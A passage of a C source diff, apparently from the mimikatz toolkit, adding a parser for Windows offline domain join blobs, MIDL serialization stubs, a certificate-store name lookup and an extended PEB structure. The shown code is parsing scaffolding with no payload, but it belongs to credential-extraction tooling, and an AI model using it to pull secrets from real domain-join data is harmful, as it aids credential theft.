"../kuhl_m_misc.h" +#include "../../../modules/kull_m_crypto.h" +#include "../../../modules/rpc/kull_m_rpc_ms-odj.h" + +void kuhl_m_misc_djoin(int argc, wchar_t* argv[]); + +void kuhl_m_misc_djoin_ODJ_PROVISION_DATA_descr(DWORD level, ULONG cbBlob, PBYTE pBlob); + +void kuhl_m_misc_djoin_ODJ_WIN7BLOB_descr(DWORD level, ULONG cbBlob, PBYTE pBlob); +void kuhl_m_misc_djoin_OP_PACKAGE_descr(DWORD level, ULONG cbBlob, PBYTE pBlob); +void kuhl_m_misc_djoin_OP_PACKAGE_PART_COLLECTION_descr(DWORD level, ULONG cbBlob, PBYTE pBlob); +void kuhl_m_misc_djoin_OP_PACKAGE_PART_descr(DWORD level, POP_PACKAGE_PART pOpPackagePart); + +void kuhl_m_misc_djoin_OP_JOINPROV2_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob); +void kuhl_m_misc_djoin_OP_JOINPROV3_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob); + +void kuhl_m_misc_djoin_OP_CERT_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob); +void kuhl_m_misc_djoin_OP_CERT_PFX_STORE_descr(DWORD level, POP_CERT_PFX_STORE pPfxStore); +void kuhl_m_misc_djoin_OP_CERT_SST_STORE_descr(DWORD level, POP_CERT_SST_STORE pSstStore); + +void kuhl_m_misc_djoin_OP_POLICY_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob); +void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_LIST_descr(DWORD level, POP_POLICY_ELEMENT_LIST pElementList); +void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_descr(DWORD level, POP_POLICY_ELEMENT pElement); \ No newline at end of file diff --git a/modules/kull_m_crypto.c b/modules/kull_m_crypto.c index 83200ba..d4462df 100644 --- a/modules/kull_m_crypto.c +++ b/modules/kull_m_crypto.c @@ -5,6 +5,8 @@ */ #include "kull_m_crypto.h" +const PCWSTR KULL_M_CRYPTO_UNK = L"?"; + BOOL kull_m_crypto_hash(ALG_ID algid, LPCVOID data, DWORD dataLen, LPVOID hash, DWORD hashWanted) { BOOL status = FALSE; @@ -991,6 +993,23 @@ DWORD kull_m_crypto_system_store_to_dword(PCWSTR name) return 0; } +PCWSTR kull_m_crypto_system_store_to_name(DWORD dwStore) +{ + DWORD i; + PCWSTR ret = KULL_M_CRYPTO_UNK; + + for (i = 0; i < ARRAYSIZE(kull_m_crypto_system_stores); i++) + { + if (kull_m_crypto_system_stores[i].id == dwStore) + { + ret = kull_m_crypto_system_stores[i].name + 18; + break; + } + } + + return ret; +} + DWORD kull_m_crypto_provider_type_to_dword(PCWSTR name) { DWORD i; diff --git a/modules/kull_m_crypto.h b/modules/kull_m_crypto.h index 9d36b03..8ac5c02 100644 --- a/modules/kull_m_crypto.h +++ b/modules/kull_m_crypto.h @@ -164,6 +164,7 @@ typedef struct _KULL_M_CRYPTO_DUAL_STRING_STRING { #define CERT_keyid_file_element 35 DWORD kull_m_crypto_system_store_to_dword(PCWSTR name); +PCWSTR kull_m_crypto_system_store_to_name(DWORD dwStore); DWORD kull_m_crypto_provider_type_to_dword(PCWSTR name); PCWSTR kull_m_crypto_provider_type_to_name(const DWORD dwProvType); PCWCHAR kull_m_crypto_provider_to_realname(PCWSTR name); diff --git a/modules/kull_m_process.h b/modules/kull_m_process.h index aa6ca9d..c5ec74f 100644 --- a/modules/kull_m_process.h +++ b/modules/kull_m_process.h @@ -266,19 +266,27 @@ typedef struct _PEB_LDR_DATA { LIST_ENTRY InInitializationOrderModulevector; } PEB_LDR_DATA, *PPEB_LDR_DATA; +typedef struct _RTL_USER_PROCESS_PARAMETERS { + BYTE Reserved1[16]; + PVOID Reserved2[10]; + UNICODE_STRING ImagePathName; + UNICODE_STRING CommandLine; +} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; + typedef struct _PEB { - BOOLEAN InheritedAddressSpace; - BOOLEAN ReadImageFileExecOptions; - BOOLEAN BeingDebugged; + BOOLEAN InheritedAddressSpace; + BOOLEAN ReadImageFileExecOptions; + BOOLEAN BeingDebugged; struct BitField { - BYTE ImageUsesLargePages :1; - BYTE SpareBits :7; + BYTE ImageUsesLargePages : 1; + BYTE SpareBits : 7; }; - HANDLE Mutant; - PVOID ImageBaseAddress; + HANDLE Mutant; + PVOID ImageBaseAddress; PPEB_LDR_DATA Ldr; + PRTL_USER_PROCESS_PARAMETERS ProcessParameters; /// ... -} PEB, *PPEB; +} PEB, * PPEB; #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64 typedef struct _LSA_UNICODE_STRING_F32 { diff --git a/modules/rpc/kull_m_rpc_ms-odj.c b/modules/rpc/kull_m_rpc_ms-odj.c new file mode 100644 index 0000000..67ac427 --- /dev/null +++ b/modules/rpc/kull_m_rpc_ms-odj.c @@ -0,0 +1,282 @@ +#include "kull_m_rpc_ms-odj.h" + +const GUID + GUID_JOIN_PROVIDER = { 0x631c7621, 0x5289, 0x4321, {0xbc, 0x9e, 0x80, 0xf8, 0x43, 0xf8, 0x68, 0xc3} }, + GUID_JOIN_PROVIDER2 = { 0x57bfc56b, 0x52f9, 0x480c, {0xad, 0xcb, 0x91, 0xb3, 0xf8, 0xa8, 0x23, 0x17} }, + GUID_JOIN_PROVIDER3 = { 0xfc0ccf25, 0x7ffa, 0x474a, {0x86, 0x11, 0x69, 0xff, 0xe2, 0x69, 0x64, 0x5f} }, + GUID_CERT_PROVIDER = { 0x9c0971e9, 0x832f, 0x4873, {0x8e, 0x87, 0xef, 0x14, 0x19, 0xd4, 0x78, 0x1e} }, + GUID_POLICY_PROVIDER = { 0x68fb602a, 0x0c09, 0x48ce, {0xb7, 0x5f, 0x07, 0xb7, 0xbd, 0x58, 0xf7, 0xec} }; + +#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64 +#define ODJ_PROVISION_DATA_Offset 2 +#define OP_PACKAGE_PART_Offset 72 +#define OP_PACKAGE_PART_COLLECTION_Offset 146 +#define OP_PACKAGE_Offset 192 +#define ODJ_WIN7BLOB_Offset 224 +#define OP_JOINPROV2_PART_Offset 418 +#define OP_JOINPROV3_PART_Offset 456 +#define OP_POLICY_PART_Offset 476 +#define OP_CERT_PART_Offset 604 +const UCHAR ms2Dodj__MIDL_TypeFormatString[] = { + 0x00, 0x00, 0x12, 0x00, 0x34, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x04, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x06, 0x00, 0x08, 0x08, 0x36, 0x5b, 0x12, 0x00, + 0xe6, 0xff, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x04, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xde, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x06, 0x00, + 0x08, 0x08, 0x36, 0x5b, 0x12, 0x00, 0xdc, 0xff, 0x12, 0x00, 0x30, 0x00, 0x1d, 0x00, 0x08, 0x00, 0x01, 0x5b, 0x15, 0x03, 0x10, 0x00, 0x08, 0x06, 0x06, 0x4c, 0x00, 0xf1, 0xff, 0x5b, 0x1b, 0x00, + 0x01, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x06, 0x00, 0x08, 0x40, 0x36, 0x5b, 0x12, 0x00, 0xe6, 0xff, 0x1a, 0x03, 0x38, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x4c, 0x00, 0xce, 0xff, 0x08, 0x40, 0x4c, 0x00, 0xe0, 0xff, 0x4c, 0x00, 0xdc, 0xff, 0x5c, 0x5b, 0x12, 0x00, 0x18, 0x00, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, + 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xd2, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x20, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x08, 0x40, 0x36, 0x4c, 0x00, 0xb1, 0xff, 0x5b, 0x12, 0x00, 0xd8, 0xff, + 0x12, 0x00, 0x02, 0x00, 0x1a, 0x03, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x00, 0x84, 0xff, 0x4c, 0x00, 0x98, 0xff, 0x4c, 0x00, 0x94, 0xff, 0x08, 0x40, 0x4c, 0x00, 0x8e, 0xff, 0x5c, 0x5b, + 0x12, 0x00, 0x9e, 0x00, 0x1c, 0x01, 0x02, 0x00, 0x17, 0x55, 0x02, 0x00, 0x01, 0x00, 0x17, 0x55, 0x00, 0x00, 0x01, 0x00, 0x05, 0x5b, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x08, 0x00, 0x06, 0x06, + 0x40, 0x36, 0x5c, 0x5b, 0x12, 0x00, 0xde, 0xff, 0x1d, 0x00, 0x06, 0x00, 0x02, 0x5b, 0x15, 0x00, 0x06, 0x00, 0x4c, 0x00, 0xf4, 0xff, 0x5c, 0x5b, 0x1b, 0x03, 0x04, 0x00, 0x04, 0x00, 0xf9, 0xff, + 0x01, 0x00, 0x08, 0x5b, 0x17, 0x03, 0x08, 0x00, 0xf0, 0xff, 0x02, 0x02, 0x4c, 0x00, 0xe0, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x48, 0x00, 0x00, 0x00, 0x14, 0x00, 0x4c, 0x00, 0xba, 0xff, 0x4c, 0x00, + 0xb6, 0xff, 0x4c, 0x00, 0xb2, 0xff, 0x4c, 0x00, 0x0a, 0xff, 0x36, 0x5b, 0x12, 0x00, 0xd6, 0xff, 0x1a, 0x03, 0x50, 0x00, 0x00, 0x00, 0x12, 0x00, 0x36, 0x36, 0x08, 0x4c, 0x00, 0xf5, 0xfe, 0x40, + 0x36, 0x36, 0x08, 0x40, 0x36, 0x36, 0x5c, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, + 0x1a, 0x03, 0xb8, 0x00, 0x00, 0x00, 0x10, 0x00, 0x36, 0x36, 0x36, 0x4c, 0x00, 0xa5, 0xff, 0x4c, 0x00, 0xbf, 0xff, 0x08, 0x40, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, + 0x25, 0x5c, 0x12, 0x00, 0x02, 0x00, 0x1a, 0x03, 0x30, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x08, 0x40, 0x36, 0x36, 0x36, 0x08, 0x40, 0x36, 0x5c, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, + 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x00, 0x02, 0x00, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x06, 0x00, 0x08, 0x40, 0x36, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x00, 0x6a, 0x00, + 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x14, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x20, 0x00, 0x00, 0x00, 0x08, 0x00, 0x36, 0x36, 0x08, 0x08, 0x36, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, + 0x25, 0x5c, 0x12, 0x00, 0xdc, 0xff, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x0c, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xd4, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x18, 0x00, + 0x00, 0x00, 0x08, 0x00, 0x36, 0x08, 0x08, 0x36, 0x5c, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x00, 0xd6, 0xff, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, + 0x00, 0x00, 0x4c, 0x00, 0xd8, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x20, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x08, 0x40, 0x36, 0x4c, 0x00, 0x15, 0xfe, 0x5b, 0x12, 0x00, 0xd8, 0xff, 0x12, 0x00, 0x82, 0x00, + 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x28, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x38, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x36, 0x08, 0x40, 0x36, 0x08, 0x40, 0x36, 0x08, 0x40, 0x36, 0x5c, 0x5b, + 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x00, 0xd2, 0xff, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, + 0x4c, 0x00, 0xca, 0xff, 0x5c, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x10, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x20, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x08, 0x40, 0x36, 0x08, 0x40, 0x36, + 0x5c, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x00, 0xde, 0xff, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x10, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xd6, 0xff, 0x5c, 0x5b, + 0x1a, 0x03, 0x30, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x08, 0x40, 0x36, 0x08, 0x40, 0x36, 0x4c, 0x00, 0x7a, 0xfd, 0x5c, 0x5b, 0x12, 0x00, 0x9a, 0xff, 0x12, 0x00, 0xd0, 0xff, 0x00, +}; +#elif defined(_M_IX86) +#define ODJ_PROVISION_DATA_Offset 2 +#define OP_PACKAGE_PART_Offset 96 +#define OP_PACKAGE_PART_COLLECTION_Offset 180 +#define OP_PACKAGE_Offset 270 +#define ODJ_WIN7BLOB_Offset 360 +#define OP_JOINPROV2_PART_Offset 700 +#define OP_JOINPROV3_PART_Offset 758 +#define OP_POLICY_PART_Offset 782 +#define OP_CERT_PART_Offset 998 +const UCHAR ms2Dodj__MIDL_TypeFormatString[] = { + 0x00, 0x00, 0x12, 0x00, 0x46, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x04, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, 0x0c, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x08, 0x00, 0x08, 0x00, 0x12, 0x00, + 0xe6, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x5c, 0x5b, 0x1b, 0x03, 0x0c, 0x00, 0x19, 0x00, 0x04, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x0c, 0x00, 0x00, 0x00, 0x01, 0x00, 0x08, 0x00, 0x08, 0x00, + 0x12, 0x00, 0xc4, 0xff, 0x5b, 0x4c, 0x00, 0xcb, 0xff, 0x5b, 0x16, 0x03, 0x0c, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x08, 0x00, 0x08, 0x00, 0x12, 0x00, 0xd0, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x5c, 0x5b, + 0x12, 0x00, 0x2c, 0x00, 0x1d, 0x00, 0x08, 0x00, 0x01, 0x5b, 0x15, 0x03, 0x10, 0x00, 0x08, 0x06, 0x06, 0x4c, 0x00, 0xf1, 0xff, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x14, 0x00, 0x01, 0x00, + 0x02, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x1c, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, 0x24, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0xda, 0xff, 0x46, 0x5c, + 0x20, 0x00, 0x20, 0x00, 0x12, 0x00, 0xdc, 0xff, 0x5b, 0x4c, 0x00, 0xbf, 0xff, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5c, 0x5b, 0x12, 0x00, 0x38, 0x00, 0x1b, 0x03, 0x24, 0x00, 0x19, 0x00, 0x00, 0x00, + 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x24, 0x00, 0x00, 0x00, 0x02, 0x00, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0xa4, 0xff, 0x20, 0x00, 0x20, 0x00, 0x12, 0x00, 0xa8, 0xff, 0x5b, 0x4c, 0x00, 0xaf, + 0xff, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x08, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, 0x10, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x00, 0xbc, 0xff, 0x46, 0x5c, + 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0xdc, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x12, 0x00, 0x26, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x10, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1b, 0x00, + 0x01, 0x00, 0x19, 0x00, 0x18, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x24, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, 0x2c, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x14, 0x00, + 0x14, 0x00, 0x12, 0x00, 0xce, 0xff, 0x46, 0x5c, 0x1c, 0x00, 0x1c, 0x00, 0x12, 0x00, 0xd0, 0xff, 0x46, 0x5c, 0x28, 0x00, 0x28, 0x00, 0x12, 0x00, 0xd2, 0xff, 0x5b, 0x4c, 0x00, 0x0d, 0xff, 0x08, + 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5c, 0x5b, 0x12, 0x00, 0xb2, 0x00, 0x16, 0x03, 0x30, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x04, 0x00, + 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x1c, 0x00, 0x1c, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x20, 0x00, 0x20, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x28, 0x00, 0x28, 0x00, + 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x2c, 0x00, 0x2c, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x5b, 0x08, 0x08, 0x08, 0x4c, 0x00, 0xb6, 0xfe, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x1c, 0x01, 0x02, 0x00, + 0x17, 0x55, 0x0e, 0x00, 0x01, 0x00, 0x17, 0x55, 0x0c, 0x00, 0x01, 0x00, 0x05, 0x5b, 0x1c, 0x01, 0x02, 0x00, 0x17, 0x55, 0x16, 0x00, 0x01, 0x00, 0x17, 0x55, 0x14, 0x00, 0x01, 0x00, 0x05, 0x5b, + 0x1c, 0x01, 0x02, 0x00, 0x17, 0x55, 0x1e, 0x00, 0x01, 0x00, 0x17, 0x55, 0x1c, 0x00, 0x01, 0x00, 0x05, 0x5b, 0x1d, 0x00, 0x06, 0x00, 0x02, 0x5b, 0x15, 0x00, 0x06, 0x00, 0x4c, 0x00, 0xf4, 0xff, + 0x5c, 0x5b, 0x1b, 0x03, 0x04, 0x00, 0x04, 0x00, 0xf9, 0xff, 0x01, 0x00, 0x08, 0x5b, 0x17, 0x03, 0x08, 0x00, 0xf0, 0xff, 0x02, 0x02, 0x4c, 0x00, 0xe0, 0xff, 0x5c, 0x5b, 0x16, 0x03, 0x6c, 0x00, + 0x4b, 0x5c, 0x46, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x08, 0x00, 0x08, 0x00, 0x12, 0x08, 0x25, 0x5c, + 0x46, 0x5c, 0x10, 0x00, 0x10, 0x00, 0x12, 0x00, 0x74, 0xff, 0x46, 0x5c, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0x7c, 0xff, 0x46, 0x5c, 0x20, 0x00, 0x20, 0x00, 0x12, 0x00, 0x84, 0xff, 0x46, 0x5c, + 0x34, 0x00, 0x34, 0x00, 0x12, 0x00, 0xa8, 0xff, 0x46, 0x5c, 0x38, 0x00, 0x38, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x3c, 0x00, 0x3c, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x54, 0x00, + 0x54, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x58, 0x00, 0x58, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x60, 0x00, 0x60, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x64, 0x00, 0x64, 0x00, + 0x12, 0x08, 0x25, 0x5c, 0x5b, 0x08, 0x08, 0x08, 0x06, 0x06, 0x08, 0x06, 0x06, 0x08, 0x06, 0x06, 0x08, 0x4c, 0x00, 0xb7, 0xfd, 0x08, 0x4c, 0x00, 0xb4, 0xfe, 0x08, 0x5b, 0x12, 0x00, 0x02, 0x00, + 0x16, 0x03, 0x18, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x08, 0x00, 0x08, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00, + 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x14, 0x00, 0x14, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x12, 0x00, 0x02, 0x00, 0x16, 0x03, 0x08, 0x00, 0x4b, 0x5c, + 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x5b, 0x08, 0x08, 0x5b, 0x12, 0x00, 0xb6, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x0c, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, + 0x14, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x10, 0x00, 0x10, 0x00, 0x12, 0x00, + 0xd2, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5c, 0x5b, 0x1b, 0x03, 0x14, 0x00, 0x19, 0x00, 0x08, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x14, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x10, 0x00, 0x10, 0x00, 0x12, 0x00, 0x9e, 0xff, 0x5b, 0x4c, 0x00, 0xa5, 0xff, 0x5b, 0x16, 0x03, 0x10, 0x00, + 0x4b, 0x5c, 0x46, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0xb6, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x1b, 0x03, 0x10, 0x00, + 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0x8c, 0xff, + 0x5b, 0x4c, 0x00, 0xb9, 0xff, 0x5b, 0x16, 0x03, 0x10, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x00, 0xc8, 0xff, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0x04, 0xfd, + 0x5b, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x12, 0x00, 0xbe, 0x00, 0x16, 0x03, 0x1c, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x08, 0x00, 0x08, 0x00, + 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x10, 0x00, 0x10, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0x60, 0xfc, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, + 0x5c, 0x5b, 0x1b, 0x03, 0x1c, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x1c, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x08, 0x00, + 0x08, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x10, 0x00, 0x10, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0x22, 0xfc, 0x5b, 0x4c, 0x00, 0x91, 0xff, 0x5b, 0x16, 0x03, 0x10, 0x00, + 0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0x6e, 0xfc, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x1b, 0x03, 0x10, 0x00, + 0x19, 0x00, 0x08, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0x44, 0xfc, + 0x5b, 0x4c, 0x00, 0xb9, 0xff, 0x5b, 0x16, 0x03, 0x18, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x00, 0x6e, 0xff, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0xbe, 0xff, + 0x46, 0x5c, 0x14, 0x00, 0x14, 0x00, 0x12, 0x00, 0x4a, 0xfc, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x00, +}; +#endif + +const RPC_CLIENT_INTERFACE ODJ___RpcClientInterface = { sizeof(RPC_CLIENT_INTERFACE), {{0x00000000, 0x0000, 0x0000, {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}}, {0, 0}}, NDR_TSI_20, 0, 0, 0, 0, 0, 0x00000000 }; +RPC_BINDING_HANDLE ODJ__MIDL_AutoBindHandle; +static const MIDL_TYPE_PICKLING_INFO __MIDL_TypePicklingInfo = {0x33205054, 0x3, 0, 0, 0,}; +const MIDL_STUB_DESC ODJ_StubDesc = { (void*)&ODJ___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &ODJ__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Dodj__MIDL_TypeFormatString, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0 }; + +size_t PODJ_PROVISION_DATA_AlignSize(handle_t _MidlEsHandle, PODJ_PROVISION_DATA* _pType) +{ + return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_PROVISION_DATA_Offset, _pType); +} + +void PODJ_PROVISION_DATA_Encode(handle_t _MidlEsHandle, PODJ_PROVISION_DATA* _pType) +{ + NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_PROVISION_DATA_Offset, _pType); +} + +void PODJ_PROVISION_DATA_Decode(handle_t _MidlEsHandle, PODJ_PROVISION_DATA* _pType) +{ + NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_PROVISION_DATA_Offset, _pType); +} + +void 